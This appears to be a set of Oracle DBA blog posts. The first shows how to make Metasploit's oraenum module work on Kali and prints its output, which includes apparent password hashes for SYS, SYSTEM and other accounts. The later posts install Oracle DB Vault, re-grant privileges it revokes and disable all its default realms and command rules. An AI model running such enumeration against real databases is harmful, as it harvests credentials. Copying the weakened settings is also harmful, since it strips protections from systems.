Using Oracle exploits or Auxilaries from Metasploit Framework at Kali

At this note I will show you how you can use Oracle auxiliaries from Metasploit Framework.Because of copyright issues ; Oracle client is not pre-installed  Kali  virtual machine and therefore Oracle auxiliaries and exploits can not  be used without Oracle Client installation .

For example try to use oraenum auxiliary ;

sf > use auxiliary/admin/oracle/oraenum
msf auxiliary(oraenum) > show options

Module options (auxiliary/admin/oracle/oraenum):

Name Current Setting Required Description
—- ————— ——– ———–
DBPASS TIGER yes The password to authenticate with.
DBUSER SCOTT yes The username to authenticate with.
RHOST yes The Oracle host.
RPORT 1521 yes The TNS port.
SID ORCL yes The sid to authenticate with.

msf auxiliary(oraenum) > set SID DB11G

msf auxiliary(oraenum) > set RHOST 192.200.11.9
RHOST => 192.200.11.9
msf auxiliary(oraenum) > run

[-] Failed to load the OCI library: cannot load such file — oci8
[-] Try ‘gem install ruby-oci8’
[*] Auxiliary module execution completed
msf auxiliary(oraenum) >

As you see you are failed to load the OCI library error.

Now we will install Oracle instant Client to Kali Linux machine and link it with metasploit Framework.

1 . Download Oracle Instant Client to Kali machine

First create necessary directories to install Oracle Instant Client.

root@kali:~# mkdir /opt/oracle
root@kali:~# cd /opt/oracle
root@kali:/opt/oracle#

Download Oracle Instant client to /opt/oracle directories from below link.

http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html

I use Kali linux x86-64.

1

 

you need to download  all these files to /opt/oracle directory.

  • instantclient-basic-linux-12.1.0.2.0.zip
  • instantclient-sqlplus-linux-12.1.0.2.0.zip
  • instantclient-sdk-linux-12.1.0.2.0.zip

 

root@kali:/opt/oracle# pwd
/opt/oracle
root@kali:/opt/oracle# ls -lrt
total 63364
-rwxr-x— 1 root root 667174 Aug 6 04:36 instantclient-sdk-linux.x64-12.1.0.2.0.zip
-rwxr-x— 1 root root 63352239 Aug 6 04:36 instantclient-basic-linux.x64-12.1.0.2.0.zip
-rwxr-x— 1 root root 861284 Aug 6 04:36 instantclient-sqlplus-linux.x64-12.1.0.2.0.zip
root@kali:/opt/oracle#

 

2. Install Oracle Client

Unzip the downloaded files and then make symlink operation.

root@kali:/opt/oracle# pwd
/opt/oracle
root@kali:/opt/oracle# unzip instantclient-basic-linux.x64-12.1.0.2.0.zip

root@kali:/opt/oracle# unzip instantclient-sqlplus-linux.x64-12.1.0.2.0.zip

root@kali:/opt/oracle# unzip instantclient-sdk-linux.x64-12.1.0.2.0.zip

root@kali:/opt/oracle# cd instantclient_12_1
root@kali:/opt/oracle/instantclient_12_1#

symlink the shared library

root@kali:/opt/oracle/instantclient_12_1# ln libclntsh.so.12.1 libclntsh.so

root@kali:/opt/oracle/instantclient_12_1# ls -lh libclntsh.so
-rwxrwxr-x 2 root root 57M Jul 7 2014 libclntsh.so

and set Environment variables

export PATH=$PATH:/opt/oracle/instantclient_12_1
export SQLPATH=/opt/oracle/instantclient_12_1
export TNS_ADMIN=/opt/oracle/instantclient_12_1
export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_1
export ORACLE_HOME=/opt/oracle/instantclient_12_1

Now the Oracle client is ready ; Just check it

root@kali:/opt/oracle/instantclient_12_1# sqlplus

SQL*Plus: Release 12.1.0.2.0 Production on Sat Aug 6 04:45:07 2016

Copyright (c) 1982, 2014, Oracle. All rights reserved.

Enter user-name:

As you see SQLplus is working. You are on the right way.

3. Download the ruby gem

Now  download and extract the gem source release:

root@kali:~# cd /opt/oracle

root@kali:/opt/oracle# wget https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.1.8.zip
–2016-08-06 04:53:22– https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.1.8.zip
Resolving github.com (github.com)… 192.30.253.112
Connecting to github.com (github.com)|192.30.253.112|:443… connected.
HTTP request sent, awaiting response… 302 Found
Location: https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.1.8 [following]
–2016-08-06 04:53:23– https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.1.8
Resolving codeload.github.com (codeload.github.com)… 192.30.253.121
Connecting to codeload.github.com (codeload.github.com)|192.30.253.121|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: unspecified [application/zip]
Saving to: ‘ruby-oci8-2.1.8.zip’

ruby-oci8-2.1.8.zip [ <=> ] 295.28K 547KB/s in 0.5s

2016-08-06 04:53:24 (547 KB/s) – ‘ruby-oci8-2.1.8.zip’ saved [302365]

 

Now unzip ruby gem,

root@kali:/opt/oracle# pwd
/opt/oracle
root@kali:/opt/oracle# ls -lrt
total 63664
-rwxr-x— 1 root root 667174 Aug 6 04:36 instantclient-sdk-linux.x64-12.1.0.2.0.zip
-rwxr-x— 1 root root 63352239 Aug 6 04:36 instantclient-basic-linux.x64-12.1.0.2.0.zip
-rwxr-x— 1 root root 861284 Aug 6 04:36 instantclient-sqlplus-linux.x64-12.1.0.2.0.zip
drwxr-xr-x 3 root root 4096 Aug 6 04:41 instantclient_12_1
-rw-r–r– 1 root root 302365 Aug 6 04:53 ruby-oci8-2.1.8.zi

root@kali:/opt/oracle# pwd
/opt/oracle
root@kali:/opt/oracle# ls -lrt
total 63664
-rwxr-x— 1 root root 667174 Aug 6 04:36 instantclient-sdk-linux.x64-12.1.0.2.0.zip
-rwxr-x— 1 root root 63352239 Aug 6 04:36 instantclient-basic-linux.x64-12.1.0.2.0.zip
-rwxr-x— 1 root root 861284 Aug 6 04:36 instantclient-sqlplus-linux.x64-12.1.0.2.0.zip
drwxr-xr-x 3 root root 4096 Aug 6 04:41 instantclient_12_1
-rw-r–r– 1 root root 302365 Aug 6 04:53 ruby-oci8-2.1.8.zip

root@kali:/opt/oracle# unzip ruby-oci8-2.1.8.zip

inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_connection_pool.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_connstr.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_datetime.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_dbi.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_dbi_clob.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_encoding.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_error.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_metadata.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_object.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_oci8.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_oracle_version.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_oradate.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_oranumber.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_package_type.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_rowid.rb

root@kali:/opt/oracle# ls -lrt
total 63668
drwxr-xr-x 7 root root 4096 Apr 4 2015 ruby-oci8-ruby-oci8-2.1.8
-rwxr-x— 1 root root 667174 Aug 6 04:36 instantclient-sdk-linux.x64-12.1.0.2.0.zip
-rwxr-x— 1 root root 63352239 Aug 6 04:36 instantclient-basic-linux.x64-12.1.0.2.0.zip
-rwxr-x— 1 root root 861284 Aug 6 04:36 instantclient-sqlplus-linux.x64-12.1.0.2.0.zip
drwxr-xr-x 3 root root 4096 Aug 6 04:41 instantclient_12_1
-rw-r–r– 1 root root 302365 Aug 6 04:53 ruby-oci8-2.1.8.zip

root@kali:/opt/oracle# cd ruby-oci8-ruby-oci8-2.1.8/
root@kali:/opt/oracle/ruby-oci8-ruby-oci8-2.1.8#

 

4. Install libgmp

Install libgmp (needed to build the gem) and set the path

root@kali:/opt/oracle# cd ruby-oci8-ruby-oci8-2.1.8/

root@kali:/opt/oracle/ruby-oci8-ruby-oci8-2.1.8#

Make an addition to PATH environment variable.

# export PATH=/opt/metasploit/ruby/bin:$PATH

root@kali:/opt/oracle/ruby-oci8-ruby-oci8-2.1.8# apt-get install libgmp-dev
Reading package lists… Done
Building dependency tree
Reading state information… Done
libgmp-dev is already the newest version (2:6.1.0+dfsg-2).
libgmp-dev set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

 

5. Build and install the gem

root@kali:/opt/oracle/ruby-oci8-ruby-oci8-2.1.8# pwd
/opt/oracle/ruby-oci8-ruby-oci8-2.1.8

root@kali:/opt/oracle/ruby-oci8-ruby-oci8-2.1.8# make
ruby -w setup.rb config
setup.rb:280: warning: assigned but unused variable – vname
setup.rb:280: warning: assigned but unused variable – desc
setup.rb:280: warning: assigned but unused variable – default2
—> lib
—> lib/oci8
<— lib/oci8
—> lib/dbd
<— lib/dbd
<— lib
—> ext
—> ext/oci8
/usr/bin/ruby2.2 /opt/oracle/ruby-oci8-ruby-oci8-2.1.8/ext/oci8/extconf.rb
checking for load library path…
LD_LIBRARY_PATH…
checking /opt/oracle/instantclient_12_1… yes
/opt/oracle/instantclient_12_1/libclntsh.so.12.1 looks like an instant client.
checking for cc… ok
checking for gcc… yes
checking for LP64… yes
checking for sys/types.h… yes
checking for ruby header… ok
checking for OCIInitialize() in oci.h… yes
checking for Oracle 8.1.0 API – start
checking for OCIEnvCreate()… yes
checking for OCILobClose()… yes
checking for OCILobCreateTemporary()… yes
checking for OCILobFreeTemporary()… yes
checking for OCILobGetChunkSize()… yes
checking for OCILobIsTemporary()… yes
checking for OCILobLocatorAssign()… yes
checking for OCILobOpen()… yes
checking for OCIMessageGet()… yes

…….

compiling object.c
compiling apiwrap.c
compiling encoding.c
compiling oranumber_util.c
compiling thread_util.c
compiling plthook_elf.c
compiling hook_funcs.c
linking shared-object oci8lib_220.so
make[1]: Leaving directory ‘/opt/oracle/ruby-oci8-ruby-oci8-2.1.8/ext/oci8’
<— ext/oci8
<— ext

And then make install

root@kali:/opt/oracle/ruby-oci8-ruby-oci8-2.1.8# pwd
/opt/oracle/ruby-oci8-ruby-oci8-2.1.8
root@kali:/opt/oracle/ruby-oci8-ruby-oci8-2.1.8# make install
ruby -w setup.rb install
setup.rb:280: warning: assigned but unused variable – vname
setup.rb:280: warning: assigned but unused variable – desc
setup.rb:280: warning: assigned but unused variable – default2
—> lib
mkdir -p /usr/local/lib/site_ruby/2.2.0/
install oci8.rb /usr/local/lib/site_ruby/2.2.0/
—> lib/oci8
mkdir -p /usr/local/lib/site_ruby/2.2.0/oci8
install compat.rb /usr/local/lib/site_ruby/2.2.0/oci8
install encoding-init.rb /usr/local/lib/site_ruby/2.2.0/oci8
install object.rb /usr/local/lib/site_ruby/2.2.0/oci8
install bindtype.rb /usr/local/lib/site_ruby/2.2.0/oci8
install ocihandle.rb /usr/local/lib/site_ruby/2.2.0/oci8
install oracle_version.rb /usr/local/lib/site_ruby/2.2.0/oci8
install connection_pool.rb /usr/local/lib/site_ruby/2.2.0/oci8
install encoding.yml /usr/local/lib/site_ruby/2.2.0/oci8
install properties.rb /usr/local/lib/site_ruby/2.2.0/oci8
install datetime.rb /usr/local/lib/site_ruby/2.2.0/oci8
install cursor.rb /usr/local/lib/site_ruby/2.2.0/oci8
install oci8.rb /usr/local/lib/site_ruby/2.2.0/oci8
install metadata.rb /usr/local/lib/site_ruby/2.2.0/oci8
<— lib/oci8
—> lib/dbd
mkdir -p /usr/local/lib/site_ruby/2.2.0/dbd
install OCI8.rb /usr/local/lib/site_ruby/2.2.0/dbd
<— lib/dbd
<— lib
—> ext
—> ext/oci8
mkdir -p /usr/local/lib/x86_64-linux-gnu/site_ruby/.
install oci8lib_220.so /usr/local/lib/x86_64-linux-gnu/site_ruby/.
<— ext/oci8
<— ext

Now Try Oracle Auxiliary one more time

root@kali:/opt/oracle/ruby-oci8-ruby-oci8-2.1.8# msfconsole

msf > use auxiliary/admin/oracle/oraenum
msf auxiliary(oraenum) > set SID DB11G
SID => DB11G
msf auxiliary(oraenum) > set RHOST 192.200.11.9
RHOST => 192.200.11.9
msf auxiliary(oraenum) > run

[*] Running Oracle Enumeration….
[*] The versions of the Components are:
[*] Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 – 64bit Production
[*] PL/SQL Release 11.2.0.4.0 – Production
[*] CORE 11.2.0.4.0 Production
[*] TNS for Linux: Version 11.2.0.4.0 – Production
[*] NLSRTL Version 11.2.0.4.0 – Production
[*] Auditing:
[*] Database Auditing is enabled!
[*] Auditing of SYS Operations is not enabled!
[*] Security Settings:
[*] SQL92 Security restriction on SELECT is not Enabled
[*] UTL Directory Access is set to
[*] Audit log is saved at /u01/app/oracle/admin/DB11G/adump
[*] Password Policy:
[*] Current Account Lockout Time is set to 1
[*] The Number of Failed Logins before an account is locked is set to 10
[*] The Password Grace Time is set to 7
[*] The Lifetime of Passwords is set to 180
[*] The Number of Times a Password can be reused is set to UNLIMITED
[*] The Maximum Number of Times a Password needs to be changed before it can be reused is set to UNLIMITED
[*] The Number of Times a Password can be reused is set to UNLIMITED
[*] Password Complexity is not checked
[*] Active Accounts on the System in format Username,Password,Spare4 are:
[*] SYS,8A8F025737A9097A,S:4F2AD836742BF4940F8635AF7A23A693069E17C38FB4EB2AAEAF55EA7F07
[*] SYSTEM,2D594E86F93B17A1,S:9AAE92874C63DBC5C43CBC2A37E0C98EAEA902912442EB11BB10070F4102
[*] SCOTT,F894844C34402B67,S:046017C46BF9B45D20FE1F7746FF2346B1185F3F38CCAF3BA5526385828B
[*] USER001,98AD9BF0E3417534,S:D0C57D9B1BB122E8D3B532DFFDB8F65D02DECD724C7A0D2A98AAC28045DF
[*] Expired or Locked Accounts on the System in format Username,Password,Spare4 are:
[*] OUTLN,4A3BA55E08595C81,S:9D0352F4707B0EEF41811E091AF4731E609EDFDD80ABD412B06B2A257529
[*] DIP,CE4A36B8E06CA59C,S:ADE7608F962BD12FE8A6564AA3E96EDA88FB9F2F11B79DCAE28AB902380C
[*] ORACLE_OCM,5A2E026A9157958C,S:E9F3700D7530A6F79F0C5A635B50BCB76F8C18D99D2B9331CEA52B8796A1
[*] DBSNMP,E066D214D5421CCC,S:3F2E9D45692FBD03D26B4EFC38A5461E8713636BB0F768500938D10EC563
[*] APPQOSSYS,519D632B7EE7F63A,S:5E6B6A62DE6FEF350B2C972B1B46126333BF4C37057D8EEF7FDF45ABA6C3
[*] WMSYS,7C9BA362F8314299,S:55E4A57548366A8A27A9CAA4CFE3877D645EDC790B699F809CB4B7C2493D
[*] XS$NULL,,S:000000000000000000000000000000000000000000000000000000000000
[*] EXFSYS,33C758A8E388DEE5,S:36D11106A9E7FBC3289C7683EA8

 

As you see It works

Do not forget to put all of these to .bashrc file

export PATH=$PATH:/opt/oracle/instantclient_12_1
export SQLPATH=/opt/oracle/instantclient_12_1
export TNS_ADMIN=/opt/oracle/instantclient_12_1
export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_1
export ORACLE_HOME=/opt/oracle/instantclient_12_1export PATH=/opt/metasploit/ruby/bin:$PATH

Advertisements

DB Vault Installation to Oracle 12c Container Database

12c-architecture

At my latest post I talked about Oracle DB Vault Installation to Oracle 12c non-container database. At this post I want to show you how you can install  Oracle DB Vault to Oracle 12c Container database.

Actually the task is very similar. But for the container databases; you should first install the root database; and then you can install to any pluggable database.

To continue this post ; you should have basic knowledge about Oracle Container databases.

https://oracle-base.com/articles/12c/multitenant-overview-container-database-cdb-12cr1

Before stating installation process; I wil show you my configuration

Host : Oracle 7 Linux

DB : Oracle 12c  12.1.0.2.0 with two pluggable databases  pdb1 and pdb2 and the database name is CDB3

During the installation I will connect to  the root container and pluggable  database by using below tns settings. As you know when you create a pluggable database a service is created by the name of pluggable database automatically.

at your tnsnames.ora file there should be tns entries   like that;
CDB3 =
(DESCRIPTION =
(ADDRESS = (PROTOCOL = TCP)(HOST = 192.200.11.9)(PORT = 1521))
(CONNECT_DATA =
(SERVER = DEDICATED)
(SERVICE_NAME = CDB3)
)
)

pdb1 =
(DESCRIPTION =
(ADDRESS = (PROTOCOL = TCP)(HOST = 192.200.11.9)(PORT = 1521))
(CONNECT_DATA =
(SERVER = DEDICATED)
(SERVICE_NAME = pdb1)
)
)

pdb2 =
(DESCRIPTION =
(ADDRESS = (PROTOCOL = TCP)(HOST = 192.200.11.9)(PORT = 1521))
(CONNECT_DATA =
(SERVER = DEDICATED)
(SERVICE_NAME = pdb2)
)
)

at this post; first I will install DB vault to root container and then pdb1 pluggable database.

Installing DB Vault to root container

1.  First check If DB Vault is alreday installed
SQL> connect SYSTEM@CDB3
Enter password:
Connected.
SQL> show con_name

CON_NAME
——————————
CDB$ROOT
SQL> column parameter format a25
SQL> column value format a10
SQL> SELECT parameter,value FROM gv$OPTION WHERE PARAMETER in
2 ( ‘Oracle Database Vault’,’Oracle Label Security’);

PARAMETER VALUE
————————- ———-
Oracle Label Security FALSE
Oracle Database Vault FALSE

After DBVault installation all these values become TRUE

 

2. Take  copy of some views about privileges;

At the SYSTEM user take some copy of privilege views at the root container. To compare privileges after DB vault installation.

SQL> create table a_cdb_network_acls as select * FROM cdb_network_acls;

Table created.

SQL> create table a_cdb_network_acl_privileges as select * from cdb_network_acl_privileges;

Table created.

SQL> create table a_cdb_tab_privs as Select * from cdb_tab_privs;

Table created.

SQL> create table a_cdb_sys_privs as Select * from cdb_sys_privs;

Table created.

SQL> create table a_cdb_role_privs as Select * from cdb_role_privs;

Table created.

SQL> create table a_cdb_objects as select owner,object_name,object_type from cdb_objects where status=’INVALID’ and object_type <> ‘SYNONYM’ ;

Table created.

SQL> create table a_cdb_registry as select * from cdb_registry;

Table created.

SQL>

3. Create DV Owner and DV  Account Manager User

DV owner user administers  DB Vault and DV Account Manager user administers all Oracle users. Because of the separation of duties these two users must be different.

for container databases we create common users .

connect sys as sysdba
SQL> create user c##dvowner identified by oracle CONTAINER=ALL;

User created.

SQL> create user c##dvacctmngr identified by oracle CONTAINER=ALL;

User created.

SQL> grant SET CONTAINER,CREATE SESSION to c##dvowner;

Grant succeeded.

SQL> grant SET CONTAINER,CREATE SESSION to c##dvacctmngr;

Grant succeeded.

4. Configure DB Vault

SQL>
SQL> BEGIN
2 DVSYS.CONFIGURE_DV (
3 dvowner_uname => ‘c##dvowner’,
4 dvacctmgr_uname => ‘c##dvacctmngr’);
5 END;
6 /

PL/SQL procedure successfully completed

And compile invalid objects

@?/rdbms/admin/utlrp.sql

…Database user “SYS”, database schema “APEX_040200”, user# “98” 16:45:10
…Compiled 0 out of 3014 objects considered, 0 failed compilation 16:45:10
…271 packages
…263 package bodies
…452 tables
…11 functions
…16 procedures
…3 sequences
…457 triggers
…1320 indexes
…211 views
…0 libraries
…6 types
…0 type bodies
…0 operators
…0 index types
…Begin key object existence check 16:45:10
…Completed key object existence check 16:45:11
…Setting DBMS Registry 16:45:11
…Setting DBMS Registry Complete 16:45:11
…Exiting validate 16:45:11

PL/SQL procedure successfully completed.

5. Enable DB Vault

SQL> connect c##dvowner
Enter password:
Connected.
SQL> show con_name

CON_NAME
——————————
CDB$ROOT
SQL> EXEC DBMS_MACADM.ENABLE_DV;

PL/SQL procedure successfully completed.

SQL> commit;

Commit complete.

6. Resart the Database 

Bingo DB Vault is ready now at container database.

SQL> connect sys as sysdba
Enter password:
Connected.

SQL> startup force
ORACLE instance started.

Total System Global Area 977272832 bytes
Fixed Size 2931520 bytes
Variable Size 645924032 bytes
Database Buffers 322961408 bytes
Redo Buffers 5455872 bytes
Database mounted.
Database opened.

SQL> alter pluggable database all open;

Pluggable database altered.
SQL> column parameter format a25
SQL> column value format a10
SQL> SELECT parameter,value FROM gv$OPTION WHERE PARAMETER in
2 ( ‘Oracle Database Vault’,’Oracle Label Security’);

PARAMETER VALUE
————————- ———-
Oracle Label Security TRUE
Oracle Database Vault TRUE

 

Now our aim is to install Db Vault one of the our pluggable database. For the demonstration I will install DB Vault to PDB1 pluggable database.

7. Give grants common users to connect PDB1

 

SQL> connect sys@pdb1 as sysdba
Enter password:
Connected.
SQL> show con_name

CON_NAME
——————————
PDB1
SQL> grant SET CONTAINER,CREATE SESSION to c##dvowner;

Grant succeeded.

SQL> grant SET CONTAINER,CREATE SESSION to c##dvacctmngr;

Grant succeeded.

8. Configure DB Vault at PDB1

SQL> connect sys@pdb1 as sysdba
Enter password:
Connected.
SQL> show con_name

CON_NAME
——————————
PDB1

SQL> BEGIN
2 DVSYS.CONFIGURE_DV (
3 dvowner_uname => ‘c##dvowner’,
4 dvacctmgr_uname => ‘c##dvacctmngr’);
5 END;
6 /

PL/SQL procedure successfully completed.

SQL> commit;

Commit complete.

now compile invalid objects

@?/rdbms/admin/utlrp.sql

…Database user “SYS”, database schema “APEX_040200”, user# “98” 16:59:40
…Compiled 0 out of 3014 objects considered, 0 failed compilation 16:59:41
…271 packages
…263 package bodies
…452 tables
…11 functions
…16 procedures
…3 sequences
…457 triggers
…1320 indexes
…211 views
…0 libraries
…6 types
…0 type bodies
…0 operators
…0 index types
…Begin key object existence check 16:59:41
…Completed key object existence check 16:59:41
…Setting DBMS Registry 16:59:41
…Setting DBMS Registry Complete 16:59:41
…Exiting validate 16:59:41

PL/SQL procedure successfully completed.

8. Enable DB Vault at PDB1

 

SQL> connect c##dvowner@pdb1
Enter password:
Connected.
SQL> EXEC DBMS_MACADM.ENABLE_DV;

PL/SQL procedure successfully completed.

SQL> commit;

Commit complete

 

9. Restart PDB1 pluggable database

SQL> startup force;
ORACLE instance started.

Total System Global Area 977272832 bytes
Fixed Size 2931520 bytes
Variable Size 645924032 bytes
Database Buffers 322961408 bytes
Redo Buffers 5455872 bytes
Database mounted.
Database opened.
SQL> alter pluggable database all open;

Pluggable database altered.

 

Now DB Vault is intalled to PD1 pluggable database

 

 

Control Points After DB Vault Installation to Oracle 12c Database

Capture

After DB vault installation to Oracle12c database you should check some important points. At this note I will give some explanations about these post-operations .

If you want to learn DB vault Installation ; Please look at DB Vault Installation post

1. Check Invalid objects one more time;

Normally System Objects would be made valid with this script

@?/rdbms/admin/utlrp.sql

But you should check application objects as well. Because some application objects can not be valid for some reasons. You should report all these changes.

As you know before DB Vault installation we created a table to hold all invalid objects at the database ( the name of this table a_dba_objects). Now take one more sample for invalid object to compare it before image.

SQL> create table b_dba_objects as select owner,object_name,object_type from dba_objects where status=’INVALID’ and object_type <> ‘SYNONYM’ ;

Table created.

Now compare two tables after and before tables;

SQL> select * from a_dba_objects minus select * from b_dba_objects
2 ;

no rows selected

Difference should be null as you expected; If there are some changes you should try to solve it. Maybe one more compilation is required.

2. Check Oracle Components 

After DB vaults installation there can be changes at some Oracle component status.Take a copy of dba_registry view  and control the status of each components.

SQL> create table b_dba_registry as select * from dba_registry;

Table created.

SQL> column comp_name format a50
SQL> column status format a10
SQL> select comp_name, status from dba_registry;

COMP_NAME STATUS
————————————————– ———-
Oracle Database Vault VALID
Oracle Application Express VALID
Oracle Label Security VALID
Spatial VALID
Oracle Multimedia VALID
Oracle Text VALID
Oracle Workspace Manager VALID
Oracle XML Database VALID
Oracle Database Catalog Views VALID
Oracle Database Packages and Types VALID
JServer JAVA Virtual Machine VALID
Oracle XDK VALID
Oracle Database Java Packages VALID
OLAP Analytic Workspace VALID
Oracle OLAP API VALID
Oracle Real Application Clusters OPTION OFF

16 rows selected.

3. Make a copy of views about privileges

This is required operation; Maybe for somehow some privileges may change during installation and this causes some problems at your applications. At the same time you should copy all Oracle parameters into a table.

SQL> create table b_dba_network_acls as select * FROM cdb_network_acls;

Table created.

SQL> create table b_dba_network_acl_privileges as select * from cdb_network_acl_privileges;

Table created.

SQL> create table b_gv$parameter as select * from gv$parameter ;

Table created.

SQL> create table b_dba_tab_privs as Select * from dba_tab_privs;

Table created.

SQL> create table b_dba_sys_privs as Select * from dba_sys_privs;

Table created.
SQL> create table b_dba_role_privs as Select * from dba_role_privs;

Table created.

 

4. Re-grant all privileges which are revoked during DB Vault Installation

During DB vault installation Oracle revoke some system and objects privileges from some roles and Public. This situation can create problems at your application. Therefore If you want to re-grant all these privileges you can use below script.

connect sys as sysdba

Grant EXECUTE on SYS.DBMS_FILE_TRANSFER to EXECUTE_CATALOG_ROLE ;
Grant EXECUTE on SYS.DBMS_LOGMNR to EXECUTE_CATALOG_ROLE ;
Grant EXECUTE on SYS.DBMS_LOGMNR_D to EXECUTE_CATALOG_ROLE ;
Grant EXECUTE on SYS.DBMS_LOGMNR_LOGREP_DICT to EXECUTE_CATALOG_ROLE ;
Grant EXECUTE on SYS.DBMS_LOGMNR_SESSION to EXECUTE_CATALOG_ROLE ;
Grant EXECUTE on SYS.UTL_FILE to PUBLIC ;
Grant BECOME USER to DBA ;
Grant CREATE ANY JOB to DBA ;
Grant CREATE EXTERNAL JOB to DBA ;
Grant DEQUEUE ANY QUEUE to DBA ;
Grant ENQUEUE ANY QUEUE to DBA ;
Grant EXECUTE ANY CLASS to DBA ;
Grant EXECUTE ANY PROGRAM to DBA ;
Grant MANAGE ANY QUEUE to DBA ;
Grant MANAGE SCHEDULER to DBA ;
Grant SELECT ANY TRANSACTION to DBA ;
Grant BECOME USER to IMP_FULL_DATABASE ;
Grant MANAGE ANY QUEUE to IMP_FULL_DATABASE ;
Grant CREATE ANY JOB to SCHEDULER_ADMIN ;
Grant CREATE EXTERNAL JOB to SCHEDULER_ADMIN ;
Grant EXECUTE ANY CLASS to SCHEDULER_ADMIN ;
Grant EXECUTE ANY PROGRAM to SCHEDULER_ADMIN ;
Grant MANAGE SCHEDULER to SCHEDULER_ADMIN ;

5. Disable Default Realms and Command Rules

After DB Vault installation some pre-defined Realms and Command rules is created by Oracle. If this is your first installation you want to disable some Realms and Command Rules. Beacause these pre-defined Realms and Command rules can create some problems at your application. This control point completely depends on your application. But I will give you below script to disable all Realms and Command Rules . After some time you can enable these rules step bye step by checking your application .

connect dvowner

select * from dvsys.DBA_DV_REALM ;

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => ‘Oracle Database Vault’,
description => ‘Defines the realm for the Oracle Database Vault schemas – DVSYS, DVF and LBACSYS where Database Vault access control configuration and roles are contained.’,
enabled => ‘N’,
audit_options => 1);
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => ‘Database Vault Account Management’,
description => ‘Defines the realm for administrators who create and manage database accounts and profiles.’,
enabled => ‘N’,
audit_options => 1);
END;
/
BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => ‘Oracle Enterprise Manager’,
description => ‘Defines the Enterprise Manager monitoring and management realm.’,
enabled => ‘N’,
audit_options => 1);
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => ‘Oracle Default Schema Protection Realm’,
description => ‘Defines the realm for the Oracle Default schemas.’,
enabled => ‘N’,
audit_options => 1);
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => ‘Oracle System Privilege and Role Management Realm’,
description => ‘Defines the realm to control granting of system privileges and database administrator roles.’,
enabled => ‘N’,
audit_options => 1);
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => ‘Oracle Default Component Protection Realm’,
description => ‘Defines the realm to protect default components of the Oracle database.’,
enabled => ‘N’,
audit_options => 1);
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => ‘Oracle System Privilege and Role Management Realm’,
description => ‘Defines the realm to control granting of system privileges and database administrator roles.’,
enabled => ‘N’,
audit_options => 1);
END;
/
commit;
select * from dvsys.DBA_DV_COMMAND_RULE;

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => ‘ALTER PROFILE’,
rule_set_name => ‘Can Maintain Accounts/Profiles’,
object_owner => ‘%’,
object_name => ‘%’,
enabled => ‘N’);
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => ‘ALTER SYSTEM’,
rule_set_name => ‘Allow Fine Grained Control of System Parameters’,
object_owner => ‘%’,
object_name => ‘%’,
enabled => ‘N’);
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => ‘ALTER USER’,
rule_set_name => ‘Can Maintain Own Account’,
object_owner => ‘%’,
object_name => ‘%’,
enabled => ‘N’);
commit;
END;
/
BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => ‘CHANGE PASSWORD’,
rule_set_name => ‘Can Maintain Own Account’,
object_owner => ‘%’,
object_name => ‘%’,
enabled => ‘N’);
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => ‘CREATE PROFILE’,
rule_set_name => ‘Can Maintain Accounts/Profiles’,
object_owner => ‘%’,
object_name => ‘%’,
enabled => ‘N’);
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => ‘CREATE USER’,
rule_set_name => ‘Can Maintain Accounts/Profiles’,
object_owner => ‘%’,
object_name => ‘%’,
enabled => ‘N’);
commit;
END;
/
BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => ‘DROP PROFILE’,
rule_set_name => ‘Can Maintain Accounts/Profiles’,
object_owner => ‘%’,
object_name => ‘%’,
enabled => ‘N’);
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => ‘DROP USER’,
rule_set_name => ‘Can Maintain Accounts/Profiles’,
object_owner => ‘%’,
object_name => ‘%’,
enabled => ‘N’);
commit;
END;
/

commit;

select * from dvsys.DBA_DV_REALM ;

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => ‘Oracle Database Vault’,
description => ‘Defines the realm for the Oracle Database Vault schemas – DVSYS, DVF and LBACSYS where Database Vault access control configuration and roles are contained.’,
enabled => ‘N’,
audit_options => 1);
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
